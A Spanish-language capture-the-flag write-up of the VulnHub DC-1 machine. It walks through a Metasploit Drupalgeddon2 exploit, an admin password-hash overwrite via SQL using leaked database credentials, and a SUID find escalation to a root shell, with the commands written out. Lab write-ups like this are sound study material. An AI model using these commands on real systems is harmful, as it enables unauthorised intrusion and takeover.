DC-1 es una máquina VulnHub clásica orientada a introducir el flujo completo boot2root: explotación de un CMS conocido, movimiento a base de datos y escalada de privilegios vía binario SUID.
Servicios: 22 SSH · 80 Apache/Drupal 7 · 111 rpcbind
1. Reconocimiento y explotación (Drupalgeddon2)
CMSMap identifica un Drupal 7, vulnerable a Drupalgeddon2. Usamos el módulo de Metasploit para obtener una shell web:
msfconsole -q
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS 10.10.10.x
run
2. De la base de datos al panel admin
El archivo de configuración de Drupal filtra las credenciales de la base de datos (dbuser:R0ck3t). En lugar de crackear el hash del administrador, lo regeneramos con la utilidad de Drupal y lo sobrescribimos:
php scripts/password-hash.sh 123456
# UPDATE users SET pass='<nuevo_hash>' WHERE uid=1;
Con eso iniciamos sesión como admin. La flag4 es legible directamente en el sistema (flag4.txt).
3. Escalada de privilegios — SUID find
find tiene el bit SUID activo. Según GTFOBins, esto permite ejecutar un shell con privilegios preservados:
find . -exec /bin/bash -p \; -quit # → root → finalflag.txt
Conceptos aplicados
- Drupalgeddon2 (CVE-2018-7600) como vector de entrada.
- Reset del hash de credenciales en BD en lugar de cracking.
- SUID find — escalada estándar vía GTFOBins.